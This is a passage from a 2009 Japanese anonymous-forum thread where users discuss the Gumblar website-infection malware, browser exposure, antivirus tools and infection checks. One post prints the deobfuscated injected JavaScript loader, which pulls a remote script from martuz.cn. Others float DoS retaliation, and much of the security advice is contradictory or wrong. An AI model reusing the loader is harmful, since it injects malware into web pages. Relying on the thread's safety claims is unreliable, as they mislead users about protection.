484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:45 ] >>462 日時についてはあてにならないです
485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:47 ] >>481 少なくとも俺のFirefoxではPDFを持ってきてくれなかった
486 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:48 ] firefoxならgoogleに報告あがればブロックしてくれるな operaだとリボンマジックそのまま開けたぞおい・・
487 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:16:53 ] わかりやすい症状が出るとすぐ対策されるんで、症状が違ったりわかりにくくなったりしてる亜種が現れてるってことか。 >>1 とかのまとめも見直す必要があるんだろうか?
488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:03 ] >>481 狐は確実に刎ねるよ
489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:23 ] gumblar.cn タイムアウトが戻る なんでだろ まあいいことだけどw
490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:24 ] >>474 おねがいですから帰ってください
491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:17:44 ] >>488 なんでそうなるんだ?理由がよくわからん
492 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:12 ] >>487 変化し過ぎて対応できるのだろうか?
493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:41 ] >>479 ton
494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:45 ] 狐が刎ねるってより対象がIE
495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:18:54 ] >>481 スクリプトがIE以外はねてた 最新のスクリプトがそうかはわからんけど 今後変わるかもしれないしどれが安全とかはあんまりないとおもう
496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:12 ] 相手するな そいつに日本語は通じない
497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:21 ] >>491 火狐はgoogleの攻撃サイトDBを読み込んでるから
498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:25 ] 毎度書き込まれるけど「確実」とか「大丈夫」とかないって
499 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:19:38 ] >>494-495 なるほど。ありがとう。 一応狐使いだが油断しないようにしておく。
500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:01 ] >>491 ttp://www.dotup.org/uploda/www.dotup.org34535.png ”今のところは”大丈夫だがな
501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:01 ] Sleipnirから火狐にするのがめんどくせええ
502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:15 ] ブラウザ選ぶぐらいで安全になるようなウィルスなら脅威ではない。
503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:20:18 ] 市販のアンチウイルスソフトいれてるから大丈夫だよね?
504 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:20:51 ] >>498 VB入ってれば確実に大丈夫だ
505 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:21:10 ] >>503 エラーでも起こしてるのかw
506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:21:44 ] >>504 そうで無くなってきた。
507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:21:50 ] >>503 バスターなら安心
508 名前:397 mailto:sage [2009/05/16(土) 23:22:35 ] カスペルスキャン中暇なんでログ漁ってたら俺と似た人がいた ただこれと違ってちゃんとカスペルが動く 更新日時確認したら2009/05/16 21:56とかなり最近、その頃PCの再起動をかけてたと思う >>1 の病状は無し。おまいらPCの再起動をかけてcmd.exeで調べてみてくれないか? 63 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:22:44 cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら ファイルが見つかりませんって出たんだけどこれはアウト? さっきまで1個のファイル 50,727バイトって表示されてたんだけど、 まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった 72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:30:24 >>65 >>66 開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。 これはセーフなのかアウトなのか・・・ 78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:38:00 >>74 カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。 指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう
509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:22:37 ] >>503 ウィルスセキュリティゼロですか^^
510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:15 ] >>509 ウィルスセキュリティゼロだとだめなんでうsか
511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:17 ] あぁ、最初からIEのみを攻撃対象にしてたのか なるほど
512 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:19 ] とりあえずSophosに乗り換えてみた これで安心…なのか?
513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:31 ] ノートン大先生がクッキーに反応したぜ やれば出来るじゃないか。安心安心
514 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:23:35 ] >>501 同意
515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:44 ] ノートン先生・・・・・・・・
516 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:23:50 ] >>503 市販のソフトはドンドン無効化しているな
517 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:23:56 ] 確実に大丈夫なのは Mozilla Firefox+ウイルスバスター
518 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:35 ] >>514 めんどくさいよな
519 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:36 ] こっちが胃もたれするくらいのアンチIE論者で火狐使いの知人が感染してたから、 「火狐だから大丈夫」なんて、とてもじゃないけど思えない
520 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:39 ] バスターさん対応するようになったのか? 昨日まで無意味だとか言われてたように思うんだけど
521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:24:43 ] サイト見なければ大丈夫だろ
522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:01 ] 俺のノートン先生は今どこに・・・?
523 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:12 ] >>510 ウイルスに対するセキュリティがゼロだから
524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:19 ] >>492 セキュリティ会社が有効な対策を出すまでは、 感染した可能性があったら再インストール、に絞っちゃった方がよかったりして。 予防に関してはこれまで通りでよさそうだけど。
525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:27 ] >>521 そういうあなたにラブレター。
526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:43 ] >>519 それ本当?
527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:49 ] >>522 もう夜も遅いからな 俺が腕枕してやったら寝ちゃったよ
528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:54 ] 同人板のやつ等がウイルスの挙動研究しててソレがまったくの的外れでワロタ
529 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:25:56 ] ブラウザ云々以前にネサフしなきゃ問題ないだろ
530 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:26:26 ] テンプレが危機感感じてここに来た人向けじゃないのが問題だわ 要するに FlashPlayerとAcrobat Readerを最新にしとけばいいだけ。 セキュ板ってコミュ弱人間多すぎか長文でしか説明できない馬鹿ばかりだねぇ
531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:27 ] linuxならアクセスしても大丈夫だよね?今のところは サブ機がubuntuなんだ
532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:33 ] なんかアレな情報が流れてるな… スクリプトはIEとそれ以外で別のコードを返すけど Firefoxも普通に攻撃対象に入ってる
533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:34 ] >>520 どうせ最新亜種には追いつけないんじゃね?
534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:44 ] 集団ヒステリーっぷりが滑稽だな
535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:44 ] フォクすけ使いだけど 亜種が出まくってるこの現状で絶対安心とかは有り得ないと思うが
536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:47 ] >>520 設定変更で昨日まで使えていた 今は使えない
537 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:26:50 ] >>518 だよなー 火狐ってめんどくさそうなイメージがある オペラにしようかな
538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:26:53 ] 同人サイトに感染してる事を運営に通報したら消えた!! よし! 被害者を無くそう!
539 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:39 ] u.batを検知できないの?こいつを検知できれば万が一感染しても大丈夫なんじゃね?
540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:41 ] WIN2Kにsqlsodbc.chmがあって サイズが サイズ 45.0 KB (46133 バイト) ディスク場のサイズ 48.0 KB (49152 バイト) だったんだがこれは感染してるって事でいいんだよね。 一応コマンドプロンプトやレジエディは立ち上がるけど ウイルスソフトの更新 ・Kaspersky とニフティオンラインスキャン は見事に失敗したし IEなんてここ一年くらい使った事無かったのに OPERA使いでもくらうのか このウイルス 最悪
541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:46 ] >>530 クマー
542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:27:53 ] gumblar.cnに田代砲撃ち込むってのは?
543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:28:19 ] >>538 そして全てのサイトが消失するorz
544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:28:43 ] 過去最強なのかなぁ、このウイルス
545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:28:52 ] >>530 このスレの1の最初のほう見たか? 長文で騒いでるのは駆け込んできたやつらだろう
546 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:29:06 ] >>540 オペラもだめか・・・ やっぱり火狐に鞍替えすべきなのかな
547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:22 ] 94.229.65.160/27の範囲を教えてくださいまし。
548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:31 ] >>532 jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか 攻撃対象になっていないように思うんだが、Firefoxが対象になってる スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。
549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:32 ] もうこんなウイルスだらけのネットに居られるか! 俺は専ブラに戻るからな!
550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:39 ] >>540 たぶんビンゴだと思うけど、そのファイルをダブルクリックするとどうなる? 本来ならヘルプファイルが開くはずなんだが。
551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:42 ] 某乙女ゲーサイトにアクセスした ソース見て、改行されてない横に長くて、なんか&だか#の多い部分が危ないスクリプト?
552 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:29:57 ] >>542 ガトリング漢砲ってのがあったな
553 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:30:00 ] >>546 アドビ更新すれば良いだけなんだけどな〜。
554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:30:18 ] ちょろめはどうかね
555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:30:25 ] 単にIEとFirefoxで挙動が違うだけで Firefoxも食らうんじゃね
556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:30:33 ] >>544 この程度が過去最強だと?
557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:07 ] >>526 本当。 オンラインスキャンでアウト判定でたらしい。 まぁ他のPCセキュリティ環境がいまいち分からないから これ以上はなんとも。
558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:17 ] >>500 セキュリティ設定で 攻撃/偽装サイトとして報告されているサイトを表示するときに報告する がonになってたときだけな
559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:31 ] >>542 何万台ものサーバーやソンビー・クライアントをコントロールできる敵に立ち向かうのか? 返り討ちにあうぞ
560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:33 ] NIMDA知らんのか あれはやばかった
561 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:34 ] 山田とか苺きんたまとかそういうレベルでおもしろい奴くればいいのに 腐女子のデスクトップ丸見え
562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:31:56 ] >>557 IEプラグイン入れてたんだろ。
563 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:32:10 ] Macなら大丈夫 この際だからお前ら全員乗り換えろ
564 名前:540 mailto:sage [2009/05/16(土) 23:32:17 ] >>550 開いていいものなのか? まあもうどうせ待避させてフォーマットしかないからどっちでも同じだろうけど
565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:32:17 ] >>558 それはあえて切らない限りはチェック入ってると思うけどな
566 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:32:34 ] >>553 もうやってる でも心配なんだよ
567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:32:56 ] アップル大勝利
568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:01 ] >>563 乗り換えると今度はMacが標的になるんですね、わかります
569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:05 ] >>564 たしかに言われてみればそうだな、やめといたほうがいいかもしれない
570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:19 ] >>563 .ハ,,ハ ( ゚ω゚ )
571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:21 ] firefoxでも感染しますたorz pdfファイルいくつか開けたからか? これから再インスコしてきますorz
572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:25 ] GENOのサーバーMacだけど感染したぞw
573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:28 ] >>558 涙拭けよ
574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:33 ] 火狐使い勝手悪い…でも我慢
575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:35 ] 442 名前: スカシタゴボウ(アラバマ州)[sage] 投稿日:2009年05月16日(土) 23:32:11.00 ID:hgwQOSJu Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) にUserAgent変えたら感染しないってマジ?
576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:50 ] >>566 FlashもReaderも削除しろwこれなら完璧だ
577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:33:54 ] >>556 相手がadobeの脆弱性を狙ってやっているが 他の脆弱性を隠し持ってないとも限らない いつ何時その攻撃手法に変えるかわからない
578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:25 ] >>572 食らったWinマシンが更新して改ざんしちゃったんだろ?
579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:29 ] ああ、そういやFirefoxでもIE Tabとか入れてたら IEエンジンで読み込む場合があるな
580 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:29 ] ヌルポ
581 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:34:41 ] デフォルトなら火狐が一番危ないよ 先読みするから
582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:01 ] IEコンポでUAをFirefoxにしたらどうなるん?
583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:13 ] >>555 いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、 対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。 Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを 拾いたいんだけど、見つからない。
584 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:14 ] 昼から何か進化した?
585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:23 ] FlashもReaderも削除したけどまだ不安だ FlashもReaderも使わない亜種が出てくるかもしれない
586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:24 ] >>548 どれも同じだよ。>>324 確かにjscript.dllのバージョンチェックが入ってるんだけど、 これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。
587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:26 ] >>526 まーAdobeReaderはFirefoxからも開けるから関係ないんじゃね? そもそもブラウザを直接狙うんじゃなくてそこから呼び出したAdobeReaderを使って感染してるみたいだし。 まさかFirefox使っておいてNoScript使ってなかったのかね
588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:35:42 ] www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。 例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や ".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、 URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。 これはひどいwww
589 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:35:48 ] >>581 エンジンが違うから火狐は大丈夫と何度云えば・・・。
590 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:03 ] >>551 <body>タグの直前だったら可能性が高い。 でもスパム対策でメアドとかを難読化してるサイトもあるから その情報だけでは何とも言えん。
591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:08 ] >>571 サイト教えて。
592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:27 ] 最新のADOBIでも危ないと聞いたんだがマジ?
593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:37 ] ウイルス感染サイトにウイルスとは別のスクリプト埋め込んで サイトにアクセスしたPCをランダムにtelnet飛ばして感染拡大とか ありえないか
594 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:36:57 ] >>571 おいサイトくらい晒してけ 何のためにこのスレいんだよ
595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:38:15 ] >>577 アホかw他のところ付いてきてから言えよw
596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:38:20 ] >>593 日本語で話せよ
597 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:38:25 ] > pdfファイルいくつか開けたからか? 本人も特定できてないんじゃないのか
598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:39:20 ] >>589 油断してんじゃねーよカス インフルエンザだって変化したんだよ
599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:39:47 ] Gecko系ブラウザは大丈夫って事?
600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:40:25 ] var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; if( (u.indexOf("Chrome")<0)&& (u.indexOf("Win")>0)&& (u.indexOf("NT 6")<0)&& (document.cookie.indexOf("miek=1")<0)&& (typeof(zrvzts)!=typeof("A")) ){ zrvzts="A"; eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); } 埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな
601 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:40:25 ] だー、寝れない だれか絶対に感染しない方法を確立してくれよ
602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:40:56 ] >>601 ネットに繋げない これマジ最強
603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:41:22 ] >>601 PCをネットに接続しない。
604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:41:28 ] >>601 ja.wikipedia.org/wiki/Lynx_ (%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6)
605 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:41:58 ] >>595 www (これはワラでなくワールドワイドウェブだwww)
606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:42:00 ] >>563 安全だって言われても MacにするとYahoo MovieやBiglobeの動画見られなくなるもん
607 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:42:21 ] もうこれでいいんじゃないか? 症状を挙げといても該当しなけりゃ安心ってわけじゃないし。 予防: Flash PlayerとAdobe Readerを最新版にする。 Adobe ReaderでJavaScriptを無効にする。 可能であればブラウザでもJavaScriptを無効にする。 感染の確認と対策: 複数の亜種が存在し、感染後にどのような症状が現れるかはわからない。 感染した可能性があれば再インストール推奨。
608 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:42:42 ] 当分自宅のPCはメールチェックと2chしか見ない
609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:42:46 ] まだ不確かな材料出していきがってる奴がいるのか
610 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:42:48 ] adobe夕方アップデートしたけど又来てるよ みんなもチェックすると良いよ
611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:43:06 ] Linuxなら兵器だよな?
612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:43:51 ] 常々申し上げているとおり FireFoxが安全なのは標的にならなかったからです。 他に安全な理由は一切ありません。
613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:43:52 ] Flash PlayerとAdobe Readerの最新版って今どれ?
614 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:44:11 ] >>601 ネットカフェいけば感染し放題だぜ! 家電量販店でもいいぜ!
615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:44:40 ] >>612 ブロックしてくれるのもFirefoxだけだがな
616 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:44:55 ] >>600 これだと、ChromeとNT 6以上を除外してるだけだな。 Firefoxも対象だ。
617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:09 ] 正直OPERAがダメだったのに狐だけが安全って気はしないんだけどどうなんだろ 今はPS3からなんでコレはいくらなんでも安全だろうがな PDF開けんからなw 2kだといろいろあって再インスコが気が遠くなるな 不愉快だがビスタ買おうかしら
618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:16 ] >>600 Chromeは感染対象から外れてたのか
619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:20 ] >>615 え?
620 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:28 ] >>610 flash playerのほうか?
621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:46 ] Google Chromeは?
622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:57 ] >>617 ちょっとPS3買ってくるわ
623 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:45:57 ] >>547 ttp://ja.wikipedia.org/wiki/IP%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9
624 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:46:09 BE:2114127195-PLT(12500)] safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/ >不正なソフトウェアをホストしていたかどうか >はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。sangsangmadang.com/, wz114.com/, futuraproject.cz/ を含む 10168 個のドメインを感染させています。 10168個のドメイン・・・だと?
625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:18 ] >>613 ここの情報を基にしたり、ここで聞いたりするより、Adobeのサイト行って調べた方が確実だと思われ
626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:24 ] >>600 埋め込まれるスクリプトも進化してるんだな。これだとFirefoxも危険だ。
627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:28 ] >>622 つ ドリームキャスト
628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:46:39 ] このスレ5人ぐらいで回してるの?
629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:02 ] また中国か
630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:22 ] >>600 今いちばん安全なのはChromeってことか。
631 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:24 ] >>501 >>514 >>518 Sleipnir → Firefox3 移行推進計画 ttp://ktrue.blog.shinobi.jp/Entry/387/ ここに書かれてるの片っ端から入れたら楽に乗り換えられた 今じゃアドオン探しに夢中だわ
632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:27 ] >>628 ここには俺とお前しかしないよ
633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:47:53 ] vistでsqlsodbc.chmファイルが3つ出てくるんだが・・ あと二つのサイズが50,004 バイト、48,663 バイト オワタ・・?
634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:24 ] >>630 一番安全なのはマックに決まってるだろ
635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:24 ] >>619 え? www.dotup.org/uploda/www.dotup.org34723.png
636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:28 ] >>632 2人だけか
637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:32 ] みんなスクリプトだよ
638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:35 ] >>629 実際には中国じゃないよ
639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:48:47 ] IE→危険 火狐→危険水域に達しつつある? くらいのキモチでいればOK?
640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:00 ] 内部破壊するわけでもないし FWで十分なのになんで騒いでるんだろ・・ ここのトピの人達って情弱?
641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:00 ] >>633 Vistaならそれは普通
642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:01 ] ウィルス作った奴誰だよ 俺の貴重なホリデイをブッ潰しやがって 許せねぇ
643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:34 ] >>634 常々申し上げているとおり Macが安全なのはry
644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:38 ] >>635 知ってたか、それGoogleの機能なんだぜ
645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:48 ] 感染したらどうなんの?
646 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:49:55 ] オレはグーグル クロムで勝ち組だわw
647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:50:12 ] Seamonkeyもやばいの?
648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:50:43 ] >>644 うん知ってるよ で?他のブラウザは?
649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:50:43 ] >>639 特に区別無くどちらも対象にされてるからどっちが安全とか無いよ 今でこそ判定文付けてるけど、そのうち全ての環境で感染できるか試すようになるかもね
650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:15 ] >>640 お前の自慢のFWで>>324 を全部踏んできてもらおうか
651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:37 ] >>649 ここ数日見てると何かそれくせえ。
652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:38 ] JavaScript切ったら、Google先生の検索結果に出てた 安全サイト確認ロゴも消えてしまった
653 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:51:59 ] >>650 全部踏んできたお
654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:52:14 ] バージョンに関してはまとめとかに書いといてもしょうがないんだよな。 いつ更新されるかわからないんだし。
